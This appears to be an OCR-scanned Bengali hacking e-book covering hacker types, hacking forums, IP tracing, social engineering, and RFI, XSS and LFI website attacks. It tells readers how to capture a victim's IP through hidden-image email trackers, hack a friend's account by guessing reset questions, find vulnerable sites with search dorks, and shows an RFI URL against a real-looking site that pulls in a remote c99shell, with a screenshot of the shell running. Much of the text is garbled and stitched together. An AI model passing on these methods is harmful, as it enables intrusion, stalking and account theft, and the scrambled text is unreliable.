M 


МИ 


হ্যাকিং জগত গ্রুপের পক্ষ থেকে আপনাকে স্বাগতম 


www.purepdfbook.com 


ang 7۹ 
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হ্যাকিং শব্দটির মধ্যেই রয়েছে একটা পশ্বৰ্য্যকর 914491 শব্দটার মধ্যেই রয়েছে TEL ছোট্ট বাচ্চা খেকে শুরু করে বৃদ্ধ সবারই হ্যাকিং 
শেখার আগ্রহ অত্যাধিক। আর এর নিরিক্ষে কাজ করে একটাই, নিজেকে হ্যাকার তৈরি করার TEL তবে হ্যাকিং দু-দিক থেকে উঠে 
আসে আমাদের সামনে এক হ্যাকিং শিথে অন্যেরক্ষতি করা দুই নিজেকে হ্যাকারের কাজ থেকে বাঁচানো। প্রথমটি অবশ্যই দন্ডনীয় 
আপরাধ, তবুও এটার প্রতি আগ্রহ অনেকাংশই বেশী। হ্যাকার হতে হলে অবশ্যই কোডিং এ দক্ষ হতে হবে যেটা হল বেসিক হ্যাকিংয়ের 

প্রথম কাজ। তাই আপনাদের হ্যাকিংয়ের কিছু প্রাথমিক ধারনা দিতে ও সকলের সুবিধার জন্য আমরা হ্যাকিংয়ের সাথে পরিচিতি এবং 

কিছু ব্যাসিক টিউটোরিয়াল নিয়ে একটি ই-বুক প্রকাশ করলাম। এখানে হ্যাকিংয়ের টিউটোরিয়াল গুলোকে উদাহরণ ও 5 
সাহায্যে সহজভাবে উপস্থাপন করার চেষ্টা করাহয়েছে। হ্যাকিং একটি অনেক বিশাল কনসেপ্ট,যা একটি মাত্র বইয়ে সংকলন করা সম্ভব 
নয়। তাই আমরা এর আরও খণ্ড এবং সংস্করণ সামনে বের করব। 
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হ্যাকিং জগৎ প্রথম খণ্ড ব্যাসিক হ্যাকিং টিউটোরিয়াল 


HÑ অধ্যায়-০১ হ্যাকার কাকে বলেঃ 

ত অধ্যায়-০২ হ্যাকার কারা? হ্যাকারদের জন্য ফোরাম ও রিসোর্স 

ME অধ্যায়-০৩ আইপি এড্রেস কি? এবং তার খুটিনাটি i 

ME অধ্যায়-০৪ আইপি এড্রেস অনুসন্ধান করা 

HÑ অধ্যায়-০৫ সোস্যাল ইঞ্জিনিয়ারিং 

Më অধ্যায়-০৬ RFI (Remote File Inclusion) ওয়েব সাইট হ্যাকিং 
HÑ অধ্যায়-০৭ XSS ওয়েব সাইট হ্যাকিং 

۲ অধ্যায়-০৮ (LFI) Local File inclusion Shell upload ওয়েব সাইট হ্যাকিং 
HÑ অধ্যায়-০৯ ۱۱5 হ্যাকিং (এক্সপি এবং সেভেন) 

ШЕ অধ্যায়-১০ DNN (Dot Net Nuke) সাথে ভিডিও ওয়েব সাইট হ্যাকিং 
Ш অধ্যায়-১১ 0405 কি, কেন এবং কিভাবে? 

ত অধ্যায়-১২ (Havij SOLi injection) ওয়েব সাইট হ্যাকিং 
ত অধ্যায়-১৩ SQL injection Manual Live ওয়েব সাইট হ্যাকিং 
Ш tyne কিভাবে ওয়েব সাইটে শেল আপলোড করতে হয় 

Ш অধ্যায়-১৫ ভিফেস পেজ কি? কিভাবে ডিফেস পেজ বানাতে হয় 
M অধ্যায়-১৬ সহজে ওয়াই-ফাই হ্যাকিং 


å å অতিরিক্ত: 
ша উঠ প্রোথামিং শিখার ৩০টি বাংলা ইবুক fre 
ГА Hacking Tools collection 2013 
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হ্যাকার হচ্ছেন সেই ব্যক্তি যিনি নিরাপত্তা/অনিরাপত্তার সাথে জড়িত এবং নিরাপত্তা ব্যবস্থার দুৰ্বল দিক খুঁজে বের 
করায় বিশেষভাবে দক্ষ অথবা অন্য কম্পিউটার ব্যবস্থায় অবৈধ অনুপ্রবেশ করতে সক্ষম বা এর সম্পর্কে 
গভীরজ্ঞানের অধিকারী। সাধারনভাবে হ্যাকার শব্দটি কালো-টুপি হ্যাকার অর্থেই সবচেয়ে বেশি ব্যবহৃত হয় যারা 
মূলত ধ্বংসমূলক বা অপরাধমূলক কর্মকান্ড করে থাকেন। এছাড়া আরো নৈতিক হ্যাকার রয়েছেন (যারা 
সাধারনভাবে সাদা টুপি হ্যাকার নামে পরিচিত) এবং নৈতিকতা সম্পর্কে অপরিষ্কার হ্যাকার আছেন যাদের ধুসর 
টুপি হ্যাকার বলে। এদের মধ্যে পার্থক্য করার জন্য প্রায়শ ক্র্যাকার শব্দটি ব্যবহার করা হয়, যা কম্পিউটার 
নিরাপত্তা হ্যাকার থেকে একাডেমিক বিষয়ের হ্যাকার থেকে আলাদা করার জন্য ব্যবহার করা হয় অথবা অসাধু 
হ্যাকার কোলো টুপি হ্যাকার) থেকে নৈতিক হ্যাকারের (সাদা টুপি হ্যাকার) পার্থক্য বুঝাতে ব্যবহৃত হয়। হ্যাকাররা 
CRAM জগতে নতুন কিছু সৃষ্টি করতে পারে,সমস্যার সমাধান করতে পারে। তারা স্বাধীনতা এবং পারস্পরিক 
সহযোগীতায় বিশ্বাসী। হ্যাকার হওয়ার সর্বপ্রথম শর্ত হচ্ছে আপনাকে আগে ঠিক করতে হবে আপনি কোন ধরনের 
হ্যাকার হবেন। উপরে ৩ ধরনের হ্যাকার সম্পর্কে বলা হয়েছে। আপনাদের সুবিধার্থে আরেকটু পোষ্ট করছি। 


সাদা টুপি হ্যাকার (White Hat Hacker)- এরা কম্পিউটার তথা 184419211564 নিরাপত্তা প্রদান করে। এরা কখনও 
অপরের ক্ষতি সাধন করে না।এদেরকে ইথিকাল হ্যাকারও বলা হয়ে 5۱ 


ধূসর টুপি হ্যাকার (Grey Hat Hacker)- এরা এমন একধরনের হ্যাকার যারাসাদা টুপি ও কালো টুপিদের মধ্যবর্তী 
স্থানে অবস্থান করে। এরা ইচ্ছে করলেকারও ক্ষতি সাধনও করতে পারে আবার উপকারও করতে পারে। 


কালো টুপি হ্যাকার (Black Hat Hacker)- হ্যাকার বলতে সাধারনত কালো টুপিহ্যাকারদেরই বুঝায়। এরা সবসময়ই 
কোন না কোন ভাবে অপরের ক্ষতি সাধন করে।সাইবার ওয়ার্ল্ডে এরা সবসময়ই ঘৃনিত হয়ে থাকে। এছাড়াও আর 
কিছু হ্যাকার ধরন রয়েছে। যেমন :- 


far কিডি (Script Kidie)- এরা নিজেরা কিছুই পারে না বরং বিভিন্নটুলস্‌ বা অন্যের বানানো ft ব্যবহার 
করে এরা কার্যোসিদ্ধি করে। 


নিওফাইট বা নোব (Neophyte 0:700৮)-এরা হ্যাকিং শিক্ষার্থী। এরা হ্যাকিং কেবল শিখছে। অন্য অর্থে এদের 
বিগিনার বা নিউবাই বলা যায়। 
লিখেছেনঃ মেহেদি হাসান 
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হ্যাকার কারা? হ্যাকারদের জন্য ফোরাম, রিসোর্স 


হ্যাকার যারা : 


হ্যাকার হচ্ছেন একজন ব্যাক্তি যিনি শুধুমাত্র বিভিন্ন মাধ্যম/সিস্টেম এর AS খুজে বের করে। কিন্তু তিনি এর 
ক্ষতিসাধন করেন না। একজন হ্যাকার মূলত একজন প্রোগ্রামার যার প্রধান কাজ হচ্ছে অনলাইনে কোন সিস্টেমের 
খারাপদিকগুলো খুজে বের করা। তারা প্রোগ্রামার এবং তারা প্রোগ্রাম নতুন নতুন খুতবের করতে ব্যবহার করে। 


হ্যাকার ফোরাম : 


আপনি একজন হ্যাকার হতে হলে প্রথমে আপনাকে বিভিন্ন ইথিকাল হ্যাকার যারামূলত ইলিট (এ ব্যাপারে আগের 
অধ্যায়ে বলা হয়েছে) তাদের থেকে গুরুত্বপূর্ণ টিপসগুলো শিখে নিতে হবে। আর বিভিন্ন ধরনের টিপস নিয়ে 
আলোচনা হয় ফোরামে।নিচে হ্যাকারদের জন্য কয়েকটি গুরুত্বপূর্ণ ফোরামের লিংক প্রদান করা হল। ফোরামগুলোতে 
যোগদিন এবং নিয়মিত পোস্টগুলো পড়ুন। কোন বিষয় জানতে চাইলে সেখানেই সাহায্য চাইতে MATI 


www.hackerthreads.orgwww.hackforums.netwww.hacker.org/forumwww.crackhackforum.com 


হ্যাকিংরিসোৰ্স : 


হ্যাকিং করতে হলে বিভিন্ন সফটওয়্যার প্রয়োজন হয়, প্রয়োজন হয় কোড, Ho, 9% ইত্যাদির। নিচে কিছু লিংক 
দেয়া হল যেখান থেকে আপনি অনেকমূল্যবান হ্যাকিং রিসোর্স পেতে পারেন যা আপনাকে হ্যাকার হতে সাহায্য 
করবে। 


http://www.ethicalhacker.net/http://insecure.org/http://hacker.resourcez.com/http://www.certifiedethicalhacker. 
com/http://www.elitehack.net/http://www.elite-hackers.com/http://www.exploit- 

db.com/http://www.1337day.com/http://www.breakthesecurity.com/http://www.thehackerslibrary.com/http://w 
ww.port7alliance.com/http://www.hackers.nl/http://hackmein.tripod.com/http://kyrionhackingtutorials.com/http 


://www.hacking- 
gurus.net/http://hackmyass. wordpress.com/http://www.borntohack. in/http://www.criticalsecurity.net/http://ww 


w.mpgh.net/http://www.duniapassword.com/http://www.progamercity.net/3YI4 Tq 


মুতি : 
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নিচে কিছু মুভির নাম দেয়া হল যা একজন হ্যাকারের দেখা অত্যান্ত 357771۱ তাহলে এখনই আরম্ভ করে দিন 
বিনোদন। আর হ্যা কোনটা কেমন লাগলো সে সম্পর্কে শেয়ার করতে ভুলবেন না কিন্ত। ভালো থাকবেন। আমার 
জন্য দোয়া করবেন। আজ এ 5۱ 


TRON (1982), THE GIRL WITH THE DRAGON TATTOO (2009), WARGAMES (1983), DIE HARD 
4:LIVE FREE OR DIE HARD (2007), SNEAKERS (1992), THE MATRIX (1999), EXISTENZ (1999), THE 
CONVERSATION (1974), THE SCORE (2001), FOOLPROOF (2003), HACKER (1995), ANTITRUST 
(2001), PIRATES OFSILICONVALLEY(1999), THE LAWNMOWER MAN (1992), THE CORE (2003), 
VIRTUOSITY (1995), TAKEDOWN (2000), DEJA VU (2006), ONE POINT 0 (2004), REVOLUTION OS 
(2001), THE NET (1995), TRON : LEGACY (2010), THE ITALIAN JOB (2003), DISCLOSURE (1994), 
JURASSICPARK(1993), SWORDFISH (2001), THE THIRTEENTH FLOOR (1999), UNTRACEABLE 
(2008), GAMER (2009) 


লিখেছেনঃ মেহেদি হাসান 
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আইপি এড্রেস কি? IP Address কি এবং তার খুঁটিনাটা 


আইপি এড্রেস কি? 
IP Address কি এবং তার খুঁটিনাটী ?? 


IP Address কি? IP Address বা Internet ProtocolAddress হল একটি সংখ্যাবিশেষ যা Network-4 যুক্তপ্রতিটি 
Device-a4 জন্য নির্ধারিত যারা Communication- 94 জন্য Internet Protocol ব্যবহার PAI প্রতিটি IP Address 
হল Unique, আপনি যখন একটা নিৰ্দিষ্ট ІР /৫৫/০5ব্যবহার করছেন তখন সেটা আর কেউ ব্যবহার করার সম্ভবনা 
নেই IP Address দিয়েই Network ব্যবহারকারীকে শনাক্ত করা হয়।আপনি যে Internet ServiceProvider-AF কাছ 
থেকে Internet পাচ্ছেন তারা এই IPAddress-AF মাধ্যমেই আপনাকে আলাদাভাবে শনাক্তকরতে পারে। 


IP Address-AF কাজ কি? IP Address-24 মূলত দু'টি কাজ রয়েছে। 


1.Host বা Network Interface শনাক্তকরণ, যাতে আপনি Я ঠকভাবে আপনার কাঙ্খিত Communication সম্পন্ন করতে 
পারেন। 


2.Network ব্যবহারকারীর অবস্থান খুঁজে বের করা। প্রতিটা IP Address একটা নিৰ্দিষ্টস্থানকে নির্দেশ করে। তাই, 
আপনি কোন জায়গা থেকে Network ব্যবহার করছেন এটা IPAddress-95 মাধ্যমে জানা যায়। ІР ۸۵06-7۲ 
হল Binary Number, কিন্ত বোঝার সুবিধার জন্য এগুলোকে মানুষের পঠনযোগ্যসংকেত অক্ষর বা সংখ্যা) দিয়ে 
প্রকাশ করা হয়ে থাকে ۱1۳ Address-38 Version 


হ্যাকারদের জন্য একটি অতি গুরুত্বপূর্ণ জিনিস হচ্ছে এই IP Address. যেহেতু IPAddress-28 মাধ্যমে Network 
ব্যবহারকারীর স্থান জানা যায়, তাই হ্যাকারের জন্য IP Address রাখা খুবই জরুরী একটা কাজ। নাহলে 
হ্যাকারের অবস্থান ফাঁস হয়ে যাওয়ার একটা চান্স থাকে। 


আপনার নিজের আইপি এড্রেস দেখা : 


প্রথমে Start Run 2 ঘরে লিখুন cmd এবার কী-বোর্ড থেকে এন্টার চাপুন। একটি কমান্ড এরিয়া দেখতে 
পাবেন। সেখানে লিখুন netstat -n এন্টার চাপুন। একটি লিস্ট আপনার সামনে আসবে। লোকাল 409014 দিকে 
খেয়াল SHTI যেটি প্রথমে আসবে সেটিই আপনার আইপি এড্রেস। দ্বিতীয় নিয়ম : আপনার ব্রাউজারের এড্রেস 
বারে লিখুন www.whatismyip.com 
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দাতার আইপি অনুসন্ধান : 


আপনার মেইলবক্স খুলুন। তার থেকে যেকোন একটি ইমেইল খুলুন। Керіу-С9 ক্লিককরুন। এবার Show original এ 
ক্লিক করুন। এখন যে তথ্যগুলো আসবে সেগুলো খুবভালোভাবে খেয়াল করুন। সেখানেই আপনি হয়ত ইমেইল 
দাতার আইপি দেখতে পাবেন। কিন্তু gmail থেকে যদি কেউ আপনাকে মেইল করে তাহলে এই পদ্ধতি অনুসারে 
আপনি আইপি খুজে পাবেন না। এখন উপায়? হ্যা হ্যা অস্থির হবেন না। এক্ষুনি তা বলছি। 


আসলে মূল ব্যাপারটি হচ্ছে gmail সবসময় https ব্যবহার করে। আমরা সাধারনত ওয়েবসাইটের 10901 দেখতে পাই 
http যার সম্পূর্ণ রূপ হচ্ছে Hyper Text Transfer Protocol. আর https হচ্ছে এই http এর secured রূপ। আশা করি 
বুঝতে পেরেছেন। যার কারনেই জিমেইলে আপনি আইপি খুজে পাবেন না। এখন যেই পদ্ধতিটির কথা আপনাদের 
বলব সেটি হচ্ছে প্রায় সব ধরনের ইমেইল এড্রেস (ইয়াহুমেইল, জিমেইল, এমএসএন ইত্যাদি) থেকে আইপি বের 
করার পদ্ধতি। প্রথমেই http://readnotify.com/ সাইটটি খুলুন। এরপর এখানে রেজিষ্ট্রেশন করুন।এখন আপনি যার 
ইমেইল এড্রেস অনুসন্ধান করতে চান তার বরারব একটি মেইল লিখুন। এবার ইমেইল টু সেকশন এরিয়ায় লিখুন 
victim'semailid.rednotify.com পাঠিয়ে hal যখন সে ইমেইলটি পড়বে তখন স্বয়ংক্রিয়ভাবে আপনার রিডনোটিফাই 
একাউন্টে তার আইপি চলে আসবে। আসলে রিডনোটিফাই একটি স্বয়ংক্রিয় লুকানো ছবি আপনার ইমেইলের সাথে > 
ব্যাক্তি বরাবর পাঠিয়ে দেয়। যার ফলে আপনি তার আইপি পেয়ে যান। পদ্ধতিটি খুব কাজের। 


Ф ওয়েব সাইড টি পছন্দ না হলে গুলো ব্যবহার করবেনঃ 


http://www.didtheyreadit.com/ 


http://www.pointofmail.com/ 


অবস্থান অনুসন্ধান : আমরা তো আইপি পেলাম এবার দেখব কিভাবে 9 ব্যাক্তির অবস্থান সম্পর্কে জানা যায়। 
অর্থাৎ ব্যাক্তিটি কোন দেশের কোন শহরে আছে তা জানা। প্রথমেই http://www.ip2location.com/ সাইটটি খুলুন। এই 
সাইটটির খালি ঘরে আপনার RS আইপি এড্রেসটি বসিয়ে দিন আর মজা দেখুন। 


আপনি যার সাথে চ্যাটিং করছেন তার অবস্থান জানা : 


আপনি যার সাথে চ্যাটিং করছেন তাকে তার আইপি সম্বন্ধে জিগ্যেস করুন। সেবললে তো বলতে হবে আপনার 
ভাগ্য 72۳۱ আর না বললে কি করবেন? একটু অপেক্ষা করুন বলছি। এখানে একটি ব্যাপার উল্লেখ করার মত 
আর তা হচ্ছে আগে আমরা একটি কমান্ডের সাথে পরিচিত হয়েছিলাম। netstat-n এর কথা মনে আছে? 
এইকমান্ডটি খুবই গুরুত্বপূর্ণ। আপনি ইন্টারনেটে যতগুলো কানেকশনের সাথে যুক্ত আছেন ঠিক ততগুলোর তথ্যই এই 
কমান্ডটির মাধ্যমে পাওয়া MAI আরেকটু ভেঙ্গে বলছি। ধরুন, মনে করুন আপনি ফেসবুকে,জিমেইলে এবং 
টেকটিউনসে একই সঙ্গে প্রবেশকরে আছেন। উপরের কমান্ডটি এই তিনটি সার্ভার সম্পর্কেই আপনার কাছে তথ্যসাপ্লাই 
করবে। বৰ্তমানে ইন্টারনেটে এক এক ব্যাক্তি চ্যাটিং এর এক এক পন্থাব্যবহার করে। যেমন : ICQ Messenger, 
MSN Messenger, Yahoo Messenger, Gtalk, Meebo, 01899, AIM ইত্যাদি। তাহলে বুঝুন কতটুকু ঝামেলার কাজ 
করতে যাচ্ছেন আপনি? আর এ কারনেই নিচে ধাপে ধাপে কয়েকটি ক্ষেত্র দেয়া হল। লক্ষকরুন। 


ক্ষেত্র-১ যদি আপনি ICQ Messenger এ চ্যাট করেন আর সেখানের কারও অবস্থান জানতে চান তাহলে এ পদ্ধতিটি 
কাজে লাগান। ICQ Messenger এর কাজ করার ধরন হচ্ছে (আপনি->আপনার বন্ধু->আপনি) এইভাবে। তাই 
কারও আইপি সংগ্রহ করাএক্ষেত্রে খুব সহজ কাজ। মনে করুন আপনি কারও আইপি জানতে চাচ্ছেন তাহলে তাকে 
হিট করুন কিন্তু চ্যাটিং শুরু করবেন না। এবার Start->Run->cmd->netstat -п4% 14 দিন। যে আইপিগুলো আসবে 
তা কোন রাফ কাগজে লিখে রাখুন। এবার আপনি তার সাথে চ্যাটিং আরম্ভ করুন। আবার Start->Run->cmd- 
>netstat -п44Л4 দিন। এবার আপনি সেখানে নতুনএকটি আইপি দেখতে MATI আর এই ব্যাক্তির সাথেইআপনি 
এখন চ্যাটিং এ ব্যান্ত।এবার কিভাবে তার অবস্থান বের করবেন তা নিশ্চয়ই আর বলে দিতে হবে AI 


ক্ষেত্ৰ-২ 


.::: Yahoo Messenger, MSN Messenger, GTalk Messenger এর ক্ষেত্রে :::উপরোক্ত মেসেনজারগুলোর কাজ করার 
ধরন হচ্ছে (আপনি-মেসেনজারেরসার্ভার-আপনার বন্ধু) এইভাবে। এখানে যদি আপনি ক্ষেত্র-১ এর পদ্ধতি কাজে 
লাগান তাহলে আপনি মেসেনজারের আইপি পাবেন, ব্যাক্তির না। এইক্ষেত্রে আপনি চালাতে পারেন সোস্যাল 
ইনিজনিয়ারিং। যদিও এটা নিয়ে পরবর্তী অধ্যায়ে আলোচনা হবে তথাপি এখানে কিছু পরিচিতি দেয়া I সোস্যাল 
ইনিজনিয়ারিং হচ্ছে কাউকে বোকা বানিয়ে তাকে হ্যাকিং করা। আর এই মেসেনজারের ক্ষেত্রে মনে রাখবেন 
অধিকাংশ মেসেনজারই এই কাজটি করে থাকে) আপনি আপনার সাথে চ্যাটিংকৃত ব্যাক্তিটিকে বলুন আপনার কাছে 
কোন ফাইল পাঠাতে বা তাকে আপনিকিছু পাঠাতে পারেন, সেটা হতে পারে কোন ছবি বা আপনার ছবি। যদি সে 
রাজি হয় তাহলে ক্ষেত্র-১ এর পদ্ধতি চালিয়ে যান। যখন আপনি তার সাথে চ্যাটিং করবেন তখন আপনি 
অতিরিক্ত যে আইপি এড্রেসটি দেখতে পাবেন সেটি হচ্ছে মেসেনজারেরআইপি আর যখন সে আপনার কাছে কোন 
কিছু পাঠাবে তখন আরেকটি নতুন আইপি দেখতেপাবেন, সেটি হচ্ছে তার আইগি। এছাড়াও আরও একটি উপায় 
আছে তা হল, আপনি তাকে আপনার কাছে একটি মেইল পাঠাতে বলতে পারেন। যখনই সে মেইল পাঠাবে আপনি 
রিডনোটিফাই পদ্ধতি চালিয়ে যান যা আগে বলা হয়েছে। কোন প্ৰশ্ন? 


(4-0 


.:: Meebo, Gigsby, Trillion ইত্যাদি মাল্টি চ্যাটিং ইনিজনের ক্ষেত্রে :::.এক্ষেত্রে কোন পদ্ধতি নেই। শুধু এতটুকুই করা 
যায় তা হল আপনি বলতে পারেন আপনাকে মেইল করতে আর আপনি রিডনোটিফাই পদ্ধতি চালাতে MATI 
আসলে কারও আইপি পাওয়া তেমন কঠিন কাজ নয় আর এটা তেমন বড় ধরনের কাজও নয়। আইপিএড্রেসের 
ব্যাপারে বলতে গেলে অনেক কথা বলতে হয়। আইপি এড্রেস রয়েছে বিভিন্ন ধরনের। আবার সেখানে সাবনেট 
আইডি এবং হোস্ট আইডি নামক ব্যাপার রয়েছে। এছাড়াও আপনি একটি ওয়েবসাইট শুধু আইপি এড্রেস লিখেই 
প্রবেশ করতে পারেন যদিও সেখানে AH ট্রান্সফার এবং কোস্ট্রা ট্রান্সফার নামক 


লিখেছেনঃ মেহেদি হাসান 
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সোস্যাল ইন্জিনিয়ারিং 


জড়িত।আপনি কোন মেয়ের সাথে দু-নম্বরি (সহজ বাংলা ব্যবহার করলাম-কিছু মনে করবেন না) করলে সেটা হবে 
সোস্যাল ইনিজনিয়ারিং। নিজের কাযোর্দারের জন্য অপরের কাছে মিথ্যা বললে সেটাও হবে সোস্যাল ইনিজনিয়ারিং। 
মূলত নিজের ET জন্য অপরের কোন রূপ ক্ষতিসাধন করাকেই বলে সোস্যাল ইনিজনিয়ারিং। 


আপনার বন্ধুর একাউন্ট হ্যাকিং করতে চাইলে Forget password এ ক্লিক করেই সাধারন কয়েকটি প্রশ্নের উত্তর 
দিয়েই আপনি হ্যাক করতে পারেন। কারন মানুষ ৯ সকল জায়গায় কিছু সাধারন প্রশ্নই বেছে নেয়, আর আপনি 
আপনার বন্ধুর সাধারনতো আছেই এমনকি অনেক গোপন তথ্যও জানেন, তাই নয় কী? তাহলে দেখা যাচ্ছে এখানে 
সোস্যাল ইন্জিনিয়ারিং একটি গুরুত্বপূর্ণ বিষয়। 


যখন টেলিফোন প্রথম আবিষ্কৃত হল তখন বিশ্বের প্রথম হ্যাকার টেলিফোনের ব্যবহারবিধি খুবভালোভাবে FOYT 
করল। সে দেখল যে যখন আমরা কাউকে SAQË তখন এইকলটি প্রথমে টেলিফোন অফিসে যায় পরে কাঙ্খিত 
ব্যাক্তিটির কাছে যায়। তখনহ্যাকার কিছু চকলেট তৈরী করে তার পকেটে রাখল সাথে রাখল একটি বাশি।সে এই 
বলল যে, চকলেটের সাথে এটা একটি গিষ্ট। এবার মানুষেরা এবং তাদের বাচ্চারা বাশিগুলো দ্বারা সুর তুলতে লাগল 
যার ফলে সৃষ্টি হল একধরনের তরঙ্গ, যা টেলিফোন সার্ভারের তরঙ্গের মত। এটাই পরবর্তীতে হ্যাকারদের সারাবিশ্বে 
বিনামূল্যে কল করতে সাহায্য করল। 


সম্পূর্ণ প্রকৃয়াটি লক্ষ করুন। সে শুধু নিজের চিন্তা কাজে লাগাল এবংএকটি ছোটবাশি তৈরী করল। তাহলে দেখুন 
সোস্যাল ইন্জিনিয়ারিং খুবইগুরুত্বপূর্ন।আপনি কোন কিছুকে বড় করতে হলে সোস্যাল ইন্জিনিয়ারিং এরসাহায্য 
ব্যাতিতসম্ভব নয়। 


আপনার বন্ধুর APS একাউন্ট হ্যাকিং করতেচাইলে Forget password এক্লিক করেই সাধারন কয়েকটি প্রশ্নের উত্তর 
দিয়েই আপনি হ্যাক করতে পারেন। কারন মানুষ এসকল জায়গায় কিছু সাধারন প্রশ্নই বেছে নেয়, আর আপনি 
আপনার বন্ধুর সাধারন তো আছেই এমনকি অনেক গোপন তথ্যও জানেন, তাই নয় কী? তাহলে দেখা যাচ্ছে এখানে 
সোস্যাল ইনিজনিয়ারিং একটি গুরুত্বপূর্ণ বিষয়। 


সোস্যাল ইনিজনিয়ারিংয়ের শক্তিশালী সংজ্ঞা : 


মানুষকতৃক ভার্চুয়াল জগতে অযাচিত কাজ যেমন কোন কর্পোরেট অফিসের নেটওয়ার্কে প্রবেশ, তাদের অনলাইন 
সিকিউরিটি, ফায়ারওয়াল, একাউন্ট ইত্যাদি নিবিড়ভাবে WAST করে তাতে আক্রমন করা। এক্ষেত্রে বিভিন্ন ধরনের 
সফটওয়্যারের সাহায্য নেয়া যায় বা নিজের বানানো কোন হার্ডওয়্যার বা কোডিং ও কাজে লাগানো যায়। 
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মনে করুন আপনার ইমেইলে এল এরকম একটি বার্তা যে, Congrats! You have got 100000 free visitor, CLICK 
HERE for withdraw. এভাবে প্রতিদিন সমগ্ৰ বিশ্বে হাজার হাজার মানুষ তাদের ক্রেডিটকার্ডের তথ্য সহ 
বিভিন্নগুরুত্বপূর্ণ তথ্য অনলাইনে জমা দিচ্ছে আর হ্যাকিংয়ের শিকার RI সোস্যাল ইন্জিনিয়ারিং নিম্নোক্ত কয়েকটি 
ভাগেবিভক্ত। 


—>impersonation 
—>posing as imp. user 
—>3rd person approach 


—>technical support 


কম্পিউটার ভিত্তিক সোস্যাল ইন্জিনিয়ারিং: 
নিচের কয়েকটি ভাগে বিভক্ত। 


—>mail/im attachments 
—>pop up windows 
—>sweepstakes 
—>spam mail 


এই অধ্যায়ের এখানেই সমাপ্তি। মনে রাখবেন কোন কাজ করার আগে এর সোস্যাল ইনিজনিয়ারিংয়ের ব্যপারটি খুব 
ভালোভাবে অনুধাবন করা উচিত। যখন আমরা কারও ইমেইলে কোন কিছু পাঠাই এবং সে যদি কিছু 


লিখেছেনঃ মেহেদি হাসান 


[ IEEE 
RF! (Remote File Inclusion)ওয়েবসাইট ۱ 
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©) :: CHARTAC :: Financial & Software Solutions - exter و‎ DER) 


&) Google Translate 


ABOUT US SERVICES METHODOLOGY PROJECTS CLIENTS CONTACT US CAREERS 


আমাদেগর কথা লিংক ٩ 24 ব্লগ বিধি «yte! দেয়াল 


Search 


VINER 


«« TunerPage 


http://h1.ripway.com/tjunselected/c99shell.php? 


http://www.cbspk.com/v2/index.php?page-http://hl.ripway.com/tjunselected/c99shell.php? 
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(S CHARTAC Business Services (Pvt.) Ltd 
27 


N 
ڪڪ‎ NS 


ABOUT US SERVICES 


METHODOLOGY 


'c99shell v. 1.0 pre-release build 


PN 


PROJECTS 


di 4 | 


CLIENTS CONTACT US 


5- 


Software: . РНР/4.3.4 


Administrator 
Safe-mode: 


På 


shell executed 


\192.168.0.16 |webfiles files (2011-2V3540849| 


Free 0 B of 0 B (0%) 
ae oa 
bal 


uname -a: Windows NT WWW6 5.2 build 3790 


nd Sec. SQL PHP-code Update Feedback 


=== 


Encoder Tools p 


SS 


g folder (1 files and 0 folders): 
Modify 


Action 
- SN 14.02.2011 05:13:38 . | 
m < 31.12,1969 18:00:00 2---- s.. | 
- 113: 
= BËNI he 158.44 KB 14.02,2011 05:13:38 হজ M | 


Done 


তবে অবশ্যই মনে রাখবেন লিংকের শেষে“? ” 
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XSS ? 

XSS হ্যাকিং সম্পর্কে জানতে হলে প্রথমেই জানতে হবে XSS জিনিসটা কি? Cross site Scripting এর সংক্ষিপ্তরূপই 
হচ্ছে ১৪৪ এটাকে আবার CSS(Cascading Style sheet) ও বলে থাকে। যার যেভাবে ইচ্ছা সে ভাবে বলে। এটা Web 
Application Vulnerability এর সবচেয়ে জনপ্রিয় গুলোর একটি। এই vulnerability একজন হ্যাকারকে একটি সাইটে 
client side scripts (বিশেষ কিছু Javascript) ইনসাৰ্ট করার অনুমতি প্ৰদান করেন। এই vulnerability দিয়ে একজন 
হ্যাকার ভিকটিমের সাইটে malicious codes, malware attack, phishing ইত্যাদি inject করাতে ۱ 


http://3.bp.blogspot.com/_IBoKsfWMAhbE/TL YDr8vVQmTI/AAAAAAAAAAM/V 1wV W YOGB70/s1600/ 
xss-threat3.jpg 


XSS Vulnerability and Injection 
ধাপ 5: Vulnerable ওয়েব সাইট খুঁজে বের করা 


আপনে প্রথমে Vulnerable সাইট খুজে বের করুন | এজন্য সে প্রথমে Google এ যান। তারপর Google Dorks 
ব্যবহার করে Vulnerable সাইট খুজে বের করেন। তাহলে আপনি তার সাথে সার্চ দিন নিচের sql Injection দিয়ে। 


"search?q=" 
তাহলে আপনি অনেকগুলো Vulnerable সাইট খুজে পাবেন। এবার একটি সাইটে প্ৰবেশ ۱ 
ধাপ 3: Vulnerability পরীক্ষা করা 


এখন আমরা যে সাইটে প্রবেশ করেছি, সেই সাইটের Vulnerability পরীক্ষা করে দেখব। এজন্য আপনাকে প্রথমে উক্ত 
সাইটের এবটি পোষ্ট বা parameter খুঁজে বের করতে AAI বুঝেছেন? 

না বুঝলে একটু অপেক্ষা করেন, বলছি। মানে আপনি এমন একটি পোষ্টখুঁজে বের করবেন যা উক্ত সাইটের সার্ভার 
পাঠাবে। যেমনঃ search query, username, password. 

Vulnerability পরীক্ষা করা জন্য দুটি পদ্ধতি আছে। 


পদ্ধতি 5: প্ৰথম পদ্ধতি হল সাইটের মূল সার্চ বক্সে injection FATI 
একজন হ্যাকার সাধারণত সাইটের মূল সার্চ বক্সে একটি malcious Script লিখে, তারপরসার্চ বাটনে ক্লিক করে। সার্চ 
দেয়ার সাথে সাথে malcious script টি ওয়েবসাইটে কাজ করা শুরু করে দেয়। 


http://2.bp.blogspot.com/- 
8z5CXuZZpeg/TpgB gtdbdBlI/AAA AAAAAASE/qCTc dxniWE/s1600/search+box.jpg 


পদ্ধতি ২: সাইটের URL এ injection ۱ 
এটি কোন সার্চ বক্সে কাজ করে না। এটি শুধু মাত্র সাইটের URL 3 কাজ করে থাকে। যেমনঃ- 


htp://vulnerablewebsite/search?q-malicious script goes here 
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Session Hijacking 
Malware Attack 
Website Defacement 
Dos attacks 


অনির্বাচিত টিউনার" ও গুগল 
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(LF!) Local Fife inclusion Shell upload ওয়েবসাইট হ্যাকিং 


শুভ কামনা আপনাদের জন্য। হ্যাকিং শিখুন কিন্তু হ্যাকিং ক্ষতি করার উদ্দেশ্যে কাজে লাগাবেন না। মূলতঃ হ্যাকিং 
ম্যাথডের শেষ নেই। আশা করি কেউ বলতে পারবে না যে, 


আমিহ্যাকিংয়ের সবই পারি, তাহলে সে ভুল KARI একের পর এক নিয়ম তৈরি RI 


